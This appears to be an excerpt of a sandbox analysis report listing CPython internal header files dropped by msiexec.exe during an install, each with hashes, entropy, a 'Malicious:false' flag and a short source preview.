                                                                                                                                Preview:#ifndef Py_INTERNAL_GLOBAL_OBJECTS_H..#define Py_INTERNAL_GLOBAL_OBJECTS_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_gc.h" // PyGC_Head..#include "pycore_global_strings.h" // struct _Py_global_strings......// These would be in pycore_long.h if it weren't for an include cycle...#define _PY_NSMALLPOSINTS 257..#define _PY_NSMALLNEGINTS 5......// Only immutable objects should be considered runtime-global...// All others must be per-interpreter.....#define _Py_GLOBAL_OBJECT(NAME) \.. _PyRuntime.global_objects.NAME..#define _Py_SINGLETON(NAME) \.. _Py_GLOBAL_OBJECT(singletons.NAME)....struct _Py_global_objects {.. struct {.. /* Small integers are preallocated in this array so that they.. * can be shared... * The integers that are preallocated are those in the range.. * -_PY_NSMALLNEGINTS (inclusive) to _PY_NSMALLP
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13375
                                                                                                                                Entropy (8bit):4.625551886350909
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:px+Ow2koMtU2WNgom4TaNGH7n1XV4gZYQObSvD+rDzrDKDqDuDGD5Dlhgf0Or1cn:pcOoo+omToKRIYJsiD63t35a2k
                                                                                                                                MD5:6BD1EC2AFDAEE91D025F303E5A07BD99
                                                                                                                                SHA1:0ED8A84D776523539A3CB9BE14D1651FE5BC82A2
                                                                                                                                SHA-256:98CD0BC1D6A1C93E0204837650210986B9BDFE489614AACA8946AC60FBED5A8F
                                                                                                                                SHA-512:694CA1152F4F347F54FF9AC03E59211FE94217E58F56F91F0C902DC220001BDFD0EC62A737B9DD19E411F1F5FAAFAE0A9E509ABD78F8E48A8E0AB586D1855493
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_GLOBAL_STRINGS_H..#define Py_INTERNAL_GLOBAL_STRINGS_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....// The data structure & init here are inspired by Tools/scripts/deepfreeze.py.....// All field names generated by ASCII_STR() have a common prefix,..// to help avoid collisions with keywords, etc.....#define STRUCT_FOR_ASCII_STR(LITERAL) \.. struct { \.. PyASCIIObject _ascii; \.. uint8_t _data[sizeof(LITERAL)]; \.. }..#define STRUCT_FOR_STR(NAME, LITERAL) \.. STRUCT_FOR_ASCII_STR(LITERAL) _ ## NAME;..#define STRUCT_FOR_ID(NAME) \.. STRUCT_FOR_ASCII_STR(#NAME) _ ## NAME;....// XXX Order by frequency of use?..../* The following is auto-generated by Tools/scripts/generate_global_objects.py. */..struct _Py_global_strings {.. struct {.. STRUCT_FOR_STR(anon_dictcomp, "<dictcomp>").. STRUCT_FOR_STR(anon_genexpr, "<genexpr>").. STRUCT_FOR_ST
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3827
                                                                                                                                Entropy (8bit):5.054489294541176
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:dx+XnNsDnEwGtN8LL0FaSzZ9/TYJ40iMLIVW2uIdv:dcXwSk08SzgJ40ev
                                                                                                                                MD5:A76B6999216DA9BBFB29AC9966C7F967
                                                                                                                                SHA1:76FB2284F63FB8AA937BDFD203CBDE5A8E3FAF21
                                                                                                                                SHA-256:68A9BA4EAECD65C6A6F661EA3BCE169569F77FD102B38DAD2B1B79B914E866AA
                                                                                                                                SHA-512:218FD909499BEAED0960BD62A716E7014462F148C273B50332F6F65CC93F272E776DF4CBE2B05C563AC49A3D2AF6720C4943CE5547F24A54905A30803D6506BE
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_HAMT_H..#define Py_INTERNAL_HAMT_H....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../*..HAMT tree is shaped by hashes of keys. Every group of 5 bits of a hash denotes..the exact position of the key in one level of the tree. Since we're using..32 bit hashes, we can have at most 7 such levels. Although if there are..two distinct keys with equal hashes, they will have to occupy the same..cell in the 7th level of the tree -- so we'd put them in a "collision" node...Which brings the total possible tree depth to 8. Read more about the actual..layout of the HAMT tree in `hamt.c`.....This constant is used to define a datastucture for storing iteration state...*/..#define _Py_HAMT_MAX_TREE_DEPTH 8......extern PyTypeObject _PyHamt_Type;..extern PyTypeObject _PyHamt_ArrayNode_Type;..extern PyTypeObject _PyHamt_BitmapNode_Type;..extern PyTypeObject _PyHamt_CollisionNode_Type;..extern PyTypeObject _PyHamtKeys_Type;..extern PyTypeObject
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4345
                                                                                                                                Entropy (8bit):4.886021075690655
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:xx+ctd/7PndGKOzq8vKJ8sZCm9nxzyshVGTMYD/gJvBgBdDK:xcc3Dku0KO3m9nxTf+jEJad2
                                                                                                                                MD5:561EE412AAA1DC737E8216C065130E47
                                                                                                                                SHA1:7BB22C4763331DEB8B2E87A2228E50943A80F54A
                                                                                                                                SHA-256:92D5335A76FE51A2E50AA5EAF90EF0DB4AC1A4559630E8B6DD99CF7C7EFEF49B
                                                                                                                                SHA-512:E82DBA41B6C000435B0FC53087576C43B3E5AC949BD134342AFE87AE24E2D27637EA4074BCB4BDB1C16853D75506FD94A7F945174CED6017910BC2D087744F0E
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_HASHTABLE_H..#define Py_INTERNAL_HASHTABLE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../* Single linked list */....typedef struct _Py_slist_item_s {.. struct _Py_slist_item_s *next;..} _Py_slist_item_t;....typedef struct {.. _Py_slist_item_t *head;..} _Py_slist_t;....#define _Py_SLIST_ITEM_NEXT(ITEM) (((_Py_slist_item_t *)ITEM)->next)....#define _Py_SLIST_HEAD(SLIST) (((_Py_slist_t *)SLIST)->head)....../* _Py_hashtable: table entry */....typedef struct {.. /* used by _Py_hashtable_t.buckets to link entries */.. _Py_slist_item_t _Py_slist_item;.... Py_uhash_t key_hash;.. void *key;.. void *value;..} _Py_hashtable_entry_t;....../* _Py_hashtable: prototypes */..../* Forward declaration */..struct _Py_hashtable_t;..typedef struct _Py_hashtable_t _Py_hashtable_t;....typedef Py_uhash_t (*_Py_hashtable_hash_func) (const void *key);..typedef int (*_Py_hashtable_com
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):770
                                                                                                                                Entropy (8bit):5.116515264053147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BCJBr6j2Lj0UYzFh+Sqw4Gqw4jQgg4QggsXQgg/hh4njaW:oiSLTfy4Gqw4MV9/34n+W
                                                                                                                                MD5:BE4C601251FFAE298771A1881E92B515
                                                                                                                                SHA1:47B4778B46715E63F361B114D57AEBC02C436A08
                                                                                                                                SHA-256:36186635419D01EFB6C64C52EE944EFD25F4223C51DE5DB237DAAD55A3D99EF9
                                                                                                                                SHA-512:49E6E815035F07CEA680A406EEE2F1840B8EE471048A3DFF9393C0914EA413FC2715FE8B6E93D22F7062F70AF542B03CB477140284E5DCE86E18013368953850
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_LIMITED_API..#ifndef Py_INTERNAL_IMPORT_H..#define Py_INTERNAL_IMPORT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifdef HAVE_FORK..extern PyStatus _PyImport_ReInitLock(void);..#endif..extern PyObject* _PyImport_BootstrapImp(PyThreadState *tstate);....struct _module_alias {.. const char *name; /* ASCII encoded string */.. const char *orig; /* ASCII encoded string */..};....PyAPI_DATA(const struct _frozen *) _PyImport_FrozenBootstrap;..PyAPI_DATA(const struct _frozen *) _PyImport_FrozenStdlib;..PyAPI_DATA(const struct _frozen *) _PyImport_FrozenTest;..extern const struct _module_alias * _PyImport_FrozenAliases;....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_IMPORT_H */..#endif /* !Py_LIMITED_API */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5983
                                                                                                                                Entropy (8bit):5.182446967690075
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Vx+7jKS2GGGjEZ6Hk5dyn/eWv/9N/mKrht6vum+x9Gt+0QH9WE7jgMDPTaNW:Vcb2GGGjEZp5GtJeWBntWEvpP2NW
                                                                                                                                MD5:D872C7EFCB138F3A01C38E26BB31D716
                                                                                                                                SHA1:D88F252E2B6216D8DDF6B191B2E1AC08949D7019
                                                                                                                                SHA-256:5DDD8A8D05B42C3CC1DD6A214CD7CDBB179A1D863498691619D0F38D1C0C8BEF
                                                                                                                                SHA-512:9DBBFFF666CA1082D45205B112999B889D16DAE33B5466A3CC86A35655F264BA81470EB62C0C561E0F7EF721228343F4E410809B27A4993FD57EBC7331A93C59
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_CORECONFIG_H..#define Py_INTERNAL_CORECONFIG_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../* Forward declaration */..struct pyruntimestate;..../* --- PyStatus ----------------------------------------------- */..../* Almost all errors causing Python initialization to fail */..#ifdef _MSC_VER.. /* Visual Studio 2015 doesn't implement C99 __func__ in C */..# define _PyStatus_GET_FUNC() __FUNCTION__..#else..# define _PyStatus_GET_FUNC() __func__..#endif....#define _PyStatus_OK() \.. (PyStatus){._type = _PyStatus_TYPE_OK,}.. /* other fields are set to 0 */..#define _PyStatus_ERR(ERR_MSG) \.. (PyStatus){ \.. ._type = _PyStatus_TYPE_ERROR, \.. .func = _PyStatus_GET_FUNC(), \.. .err_msg = (ERR_MSG)}.. /* other fields are set to 0 */..#define _PyStatus_NO_MEMORY() _PyStatus_ERR("memory allocation failed")..#define _PyStatus_EXIT(EXITCODE) \.. (
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6898
                                                                                                                                Entropy (8bit):4.798740211149107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Vx+XsMFcyP4UOk412v/rDW5e6HXBCbFzm7INmyujd4AC82VbgJxu+P:VcX5FcyP4yc4/9Y7ImyujTC5b4xnP
                                                                                                                                MD5:5826AD18F5C0C38AA6ED9E5BC15ECEA4
                                                                                                                                SHA1:9A35AAD0730C95D353FDB7BB611514F5408CBFE9
                                                                                                                                SHA-256:8FFCAB021AD4F47F932606F7DB7A2006813055922C56D5113161F9D6E28C7E05
                                                                                                                                SHA-512:873976DCD2AE8821F91DCFBD804048BE7BFD9116214B77C897B0307B82D39DE15095D668E98248109F1AC64F03E3DED2469D4661C34753646A721274229765AF
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_INTERP_H..#define Py_INTERNAL_INTERP_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include <stdbool.h>....#include "pycore_atomic.h" // _Py_atomic_address..#include "pycore_ast_state.h" // struct ast_state..#include "pycore_code.h" // struct callable_cache..#include "pycore_context.h" // struct _Py_context_state..#include "pycore_dict.h" // struct _Py_dict_state..#include "pycore_exceptions.h" // struct _Py_exc_state..#include "pycore_floatobject.h" // struct _Py_float_state..#include "pycore_genobject.h" // struct _Py_async_gen_state..#include "pycore_gil.h" // struct _gil_runtime_state..#include "pycore_gc.h" // struct _gc_runtime_state..#include "pycore_list.h" // struct _Py_list_state..#include "pycore_tuple.h" // struct _Py_tuple_state..#include "pycore_typeobject.h" // struct type_cache..#
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):584
                                                                                                                                Entropy (8bit):5.195201353801979
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:U3cPr6M21LM2f4r3Z/HQUZaQGImhUnIhYncknUhWPKM2l:pW/1L/MxwUZaGeWK/l
                                                                                                                                MD5:351D2F25BF68ABC67B15CCD3DBF7F51D
                                                                                                                                SHA1:9AACCF7C1C4733E7F61E7EA193732977A4968504
                                                                                                                                SHA-256:0E7EDD2C536B5252DE6949BB10A59E3EF6493497B20B9386D4F4CFF04137E46C
                                                                                                                                SHA-512:0DC73B04F56EAB41178DCF3C3D82E7D92BDCDF99BBB2DFA0882601AB4FE52D8572C88F504AEB0980EFE6A7BE8FB24BEE2B318827923CEB348E9B9E7432CF4AD0
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Interpreter ID Object */....#ifndef Py_INTERNAL_INTERPRETERIDOBJECT_H..#define Py_INTERNAL_INTERPRETERIDOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....PyAPI_DATA(PyTypeObject) _PyInterpreterID_Type;....PyAPI_FUNC(PyObject *) _PyInterpreterID_New(int64_t);..PyAPI_FUNC(PyObject *) _PyInterpreterState_GetIDObject(PyInterpreterState *);..PyAPI_FUNC(PyInterpreterState *) _PyInterpreterID_LookUp(PyObject *);....#ifdef __cplusplus..}..#endif..#endif // !Py_INTERNAL_INTERPRETERIDOBJECT_H..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1414
                                                                                                                                Entropy (8bit):5.192872664428317
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gWeLWLxwUZaGUP0MBbZv6RS9754f5laFYBvJRFo8jZybhRanW7:gPGxba6WMRT3v/FtjobhRaq
                                                                                                                                MD5:841DAA85844D5F326B6221E782AE170D
                                                                                                                                SHA1:8E4443CB696DA5DEE92A62F9A7A9B306F7FCAD02
                                                                                                                                SHA-256:5A531A5C2892378024F8ED2007E1C09678D28C23769FBCDD13D78D8BB34FEA0D
                                                                                                                                SHA-512:61F10B2B15333EFCD02B57C7F8043A8C3DF3ED4CBA4C13A3C99E33F9B46EDF4D126A9A6582CD29A117409B4CAB70D5D732427FB4AA1778117E1F56AAB977C082
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_LIST_H..#define Py_INTERNAL_LIST_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "listobject.h" // _PyList_CAST()....../* runtime lifecycle */....extern void _PyList_Fini(PyInterpreterState *);....../* other API */....#ifndef WITH_FREELISTS..// without freelists..# define PyList_MAXFREELIST 0..#endif..../* Empty list reuse scheme to save calls to malloc and free */..#ifndef PyList_MAXFREELIST..# define PyList_MAXFREELIST 80..#endif....struct _Py_list_state {..#if PyList_MAXFREELIST > 0.. PyListObject *free_list[PyList_MAXFREELIST];.. int numfree;..#endif..};....#define _PyList_ITEMS(op) (_PyList_CAST(op)->ob_item)....extern int.._PyList_AppendTakeRefListResize(PyListObject *self, PyObject *newitem);....static inline int.._PyList_AppendTakeRef(PyListObject *self, PyObject *newitem)..{.. assert(self != NULL && newitem != NULL);.. assert(PyList_Check(s
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3630
                                                                                                                                Entropy (8bit):5.405765808851375
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:gtAxbahNA6U8jGHrxUgYEDT9d0V3qUx7FfaNFF4/f5U3f5/aPof58vRt8nFdcdNJ:Bx+vAP8y5htOV3q22WhqhMoh85RP5X
                                                                                                                                MD5:1C18EFE74BE6555649E7AC620E36A2BF
                                                                                                                                SHA1:364513DA885CB5E83F4B60613C8F804831D67B89
                                                                                                                                SHA-256:FB16B1B1647C50E78939C8F00C371218DBE062EDB394A64A2C4D9C3284EA3309
                                                                                                                                SHA-512:AAEE7F797AFE178B1DCAF964EBEDD0CB85DF8F85FFB473F65620807082B8424A652600936D7DE0778EBC95C2F9406E16EC1F353253D074AD72E35AF2A12EBA30
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_LONG_H..#define Py_INTERNAL_LONG_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_global_objects.h" // _PY_NSMALLNEGINTS..#include "pycore_runtime.h" // _PyRuntime..../*.. * Default int base conversion size limitation: Denial of Service prevention... *.. * Chosen such that this isn't wildly slow on modern hardware and so that.. * everyone's existing deployed numpy test suite passes before.. * https://github.com/numpy/numpy/issues/22098 is widely available... *.. * $ python -m timeit -s 's = "1"*4300' 'int(s)'.. * 2000 loops, best of 5: 125 usec per loop.. * $ python -m timeit -s 's = "1"*4300; v = int(s)' 'str(v)'.. * 1000 loops, best of 5: 311 usec per loop.. * (zen2 cloud VM).. *.. * 4300 decimal digits fits a ~14284 bit number... */..#define _PY_LONG_DEFAULT_MAX_STR_DIGITS 4300../*.. * Threshold for max digits check. For performance reasons int() and.. *
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1082
                                                                                                                                Entropy (8bit):5.151552549754499
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:g+JL+YxwUZaG+xPtbv2wJhDGEijhDGGdJZ6vpk1n+E:gUdxbaB9DJhvehbJEa5d
                                                                                                                                MD5:C807BB57FF57882D71B18C8D43628340
                                                                                                                                SHA1:AB2310DBF39FA6B6C4F7E21CD6A8C4566E405309
                                                                                                                                SHA-256:54951B99B87825804194B964E535E2896F1C0DC5517708485A2B9DFE5CFA1E5E
                                                                                                                                SHA-512:9148EBEDBBFA7AC7E4B3AC9B3DAAB4870229F0A46C3A8338C1EF66DA71CBD596DF49359742B5447F30C8DFE2076E3D45A27AFF347924F49BCFF246029B459FA1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_MODULEOBJECT_H..#define Py_INTERNAL_MODULEOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....typedef struct {.. PyObject_HEAD.. PyObject *md_dict;.. PyModuleDef *md_def;.. void *md_state;.. PyObject *md_weaklist;.. // for logging purposes after md_dict is cleared.. PyObject *md_name;..} PyModuleObject;....static inline PyModuleDef* _PyModule_GetDef(PyObject *mod) {.. assert(PyModule_Check(mod));.. return ((PyModuleObject *)mod)->md_def;..}....static inline void* _PyModule_GetState(PyObject* mod) {.. assert(PyModule_Check(mod));.. return ((PyModuleObject *)mod)->md_state;..}....static inline PyObject* _PyModule_GetDict(PyObject *mod) {.. assert(PyModule_Check(mod));.. PyObject *dict = ((PyModuleObject *)mod) -> md_dict;.. // _PyModule_GetDict(mod) must not be used after calling module_clear(mod).. assert(dict != NULL);.. return dic
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):412
                                                                                                                                Entropy (8bit):5.228991104819668
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:jcVvWuv/r6YRHLYRR4r3Z/HQUZaQGI+enfEeBLzYRn:YVvmEHLE6xwUZaG+sEEEn
                                                                                                                                MD5:B40376AC3D9038E8B70D4BCD22BE5442
                                                                                                                                SHA1:4F6B8114995D78002C9E9AC3EBCC19CCA12160BE
                                                                                                                                SHA-256:BAF192C63B21A85248DD57A16096919451AB2E102A8176E1B22F72B417E8E011
                                                                                                                                SHA-512:680F54E6E69BF14E928F591ED0C99D787DDF33AA8E519D00CD019A11BBC0F63FCB485AED503EC7BB99936AB09C52116AD8717A9D1C10510628675CE750D20CF0
                                                                                                                                Malicious:false
                                                                                                                                Preview:// Simple namespace object interface....#ifndef Py_INTERNAL_NAMESPACE_H..#define Py_INTERNAL_NAMESPACE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....PyAPI_DATA(PyTypeObject) _PyNamespace_Type;....PyAPI_FUNC(PyObject *) _PyNamespace_New(PyObject *kwds);....#ifdef __cplusplus..}..#endif..#endif // !Py_INTERNAL_NAMESPACE_H..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10347
                                                                                                                                Entropy (8bit):5.229382096900326
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:JcOMUjJ+T4k8qamAbE2VFAbxkIfNrp5R/6XhcLfQ0src2:cUd+3jadbEOWbZ7/50vc2
                                                                                                                                MD5:9CE1E28E228BE904EEAD6A1604FEEEF2
                                                                                                                                SHA1:58B32E4F25688328B2264A4FE730E50AE3005ED7
                                                                                                                                SHA-256:43B6AD110FE9150C4D0B8B690D94BB46260037A5A3E2724D803E8355CAAE8503
                                                                                                                                SHA-512:46315C322C0C3CBC25FD7FBC2E5EA2D377EBB63DF7836F8B653E6E80C35BDA08673BBDE3BCD8FA6BF33D2DDEBBFA3DDAC132E66D6EA019E913AC4868F16BBE8B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_OBJECT_H..#define Py_INTERNAL_OBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include <stdbool.h>..#include "pycore_gc.h" // _PyObject_GC_IS_TRACKED()..#include "pycore_interp.h" // PyInterpreterState.gc..#include "pycore_pystate.h" // _PyInterpreterState_GET()..#include "pycore_runtime.h" // _PyRuntime....#define _PyObject_IMMORTAL_INIT(type) \.. { \.. .ob_refcnt = 999999999, \.. .ob_type = type, \.. }..#define _PyVarObject_IMMORTAL_INIT(type, size) \.. { \.. .ob_base = _PyObject_IMMORTAL_INIT(type), \.. .ob_size = size, \.. }....PyAPI_FUNC(void) _Py_NO_RETURN _Py_FatalRefcountErrorFunc(.. const char *func,.. const char *message);....#define _Py_FatalRefcountError(message) _Py_FatalRefcountErrorFunc(__func__, message)....static inline void.._Py_DECREF_SPECIALIZED(PyObject *op, const destructor dest
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):19567
                                                                                                                                Entropy (8bit):4.98690577777909
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:PVBbTB9oKLZG3L7nq9cbFQw0SfNrLMBBZxppy6FZl2XECbysRT:dBbTB9QL7nq9cZPfNrLsZxppd2AsRT
                                                                                                                                MD5:1D61095C5CE373ACA040D5A104957EC0
                                                                                                                                SHA1:EE62152DB89FA041A1A84310B32C11810CFD5F7A
                                                                                                                                SHA-256:0B28E6D1306B707F53029EB6825A672EE0D3C2C7CA3CB746974E86719033070B
                                                                                                                                SHA-512:F7AC7B14F46164F98C44FDC454132C3B6990C020A5CF0BE5A1AE0079D8677B0DA1FE7B54FA5A1D719F69474A46210D8180EE3B44130D8C072B1225D175657055
                                                                                                                                Malicious:false
                                                                                                                                Preview:// Auto-generated by Tools/scripts/generate_opcode_h.py from Lib/opcode.py....#ifndef Py_INTERNAL_OPCODE_H..#define Py_INTERNAL_OPCODE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "opcode.h"....extern const uint8_t _PyOpcode_Caches[256];....extern const uint8_t _PyOpcode_Deopt[256];....#ifdef NEED_OPCODE_TABLES..static const uint32_t _PyOpcode_RelativeJump[8] = {.. 0U,.. 0U,.. 536870912U,.. 135118848U,.. 4163U,.. 122880U,.. 0U,.. 0U,..};..static const uint32_t _PyOpcode_Jump[8] = {.. 0U,.. 0U,.. 536870912U,.. 135118848U,.. 4163U,.. 122880U,.. 0U,.. 0U,..};....const uint8_t _PyOpcode_Caches[256] = {.. [BINARY_SUBSCR] = 4,.. [STORE_SUBSCR] = 1,.. [UNPACK_SEQUENCE] = 1,.. [STORE_ATTR] = 4,.. [LOAD_ATTR] = 4,.. [COMPARE_OP] = 2,.. [LOAD_GLOBAL] = 5,.. [BINARY_OP] = 1,.. [LOAD_METHOD] = 10,.. [PRECALL] = 1,.. [CALL
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):657
                                                                                                                                Entropy (8bit):5.027043517018739
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B62G2L2G04r3Z/HQUZaQGIzPi5T4bv7gAgPijRpDL1vHevfkHn2u:gMLVxwUZaGzI4nFg4RpDJHqcnV
                                                                                                                                MD5:6489CE9BB88C9EE6F47AFEC2077C7099
                                                                                                                                SHA1:6A29DA499A05420F0E6540107076837D18903413
                                                                                                                                SHA-256:0CC055EF7FB28786979D34191870FF9F96B8ACB9787904414AA99DC5CAA43FEB
                                                                                                                                SHA-512:C3F8B852894E138834ECAB5B92E75F8372602AD4BB36AC2F573ED6CBA9ABB1A13F5F44DE5080A0AE3EE138385BE7C07973F7A9968BE307A5A661B3FBB85298B6
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_PARSER_H..#define Py_INTERNAL_PARSER_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....extern struct _mod* _PyParser_ASTFromString(.. const char *str,.. PyObject* filename,.. int mode,.. PyCompilerFlags *flags,.. PyArena *arena);..extern struct _mod* _PyParser_ASTFromFile(.. FILE *fp,.. PyObject *filename_ob,.. const char *enc,.. int mode,.. const char *ps1,.. const char *ps2,.. PyCompilerFlags *flags,.. int *errcode,.. PyArena *arena);....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_PARSER_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):630
                                                                                                                                Entropy (8bit):5.302933373107816
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B60THL0TR4r3Z/HQUZaQGI5OvmQgbArmhEmArml5AAMmtaRE9YOJmuEv8n06:g0LL02xwUZaGovmcrmS3rmlezmtaREiG
                                                                                                                                MD5:BE825814CC794CB6D8720D67BBD204E6
                                                                                                                                SHA1:0CF19CDF3A0FDF47BD1F7E041770AABE5CF023AB
                                                                                                                                SHA-256:7D1F56DE591AA1DD4096F697D6CA8BB15EF3F74C4813779629B923BD584EFAD4
                                                                                                                                SHA-512:2764DBF976A12B4D94C664327CA7B80F0361CE6B4CF970FB9022362469906E7FD763B8E614C0835173992D8A297D5B216FC206E00E85735FBF408BFD133100DF
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_PATHCONFIG_H..#define Py_INTERNAL_PATHCONFIG_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....PyAPI_FUNC(void) _PyPathConfig_ClearGlobal(void);..extern PyStatus _PyPathConfig_ReadGlobal(PyConfig *config);..extern PyStatus _PyPathConfig_UpdateGlobal(const PyConfig *config);..extern const wchar_t * _PyPathConfig_GetGlobalModuleSearchPath(void);....extern int _PyPathConfig_ComputeSysPath0(.. const PyWideStringList *argv,.. PyObject **path0);......#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_PATHCONFIG_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2797
                                                                                                                                Entropy (8bit):4.915857699766388
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:34tDixbaBaXEGuJMTohTPnXj5wlJ3gxnAHKaN3WNZyBvjTZmAjFmISH5PkfzYl92:34wx+2RuJMT0TPnXj5wlxtKuWKB7ksPX
                                                                                                                                MD5:47EDC5FF2506B956BE8D5BFD0A3C1581
                                                                                                                                SHA1:6B52E1DAA62A125CA327F69A5AECC549E0B56C7F
                                                                                                                                SHA-256:A43A0C6D97213D42E810454AD9D82ECC8AE899C53D26A60AAF90D31EE54FAF05
                                                                                                                                SHA-512:4A30FB7FC737A7C10691855E32787638611381862AA4AA8BB69CBC2CE39C23A3AF7F74913C643C4C352C88D74595F0796D73D415713F2D634B70782EADA10A78
                                                                                                                                Malicious:false
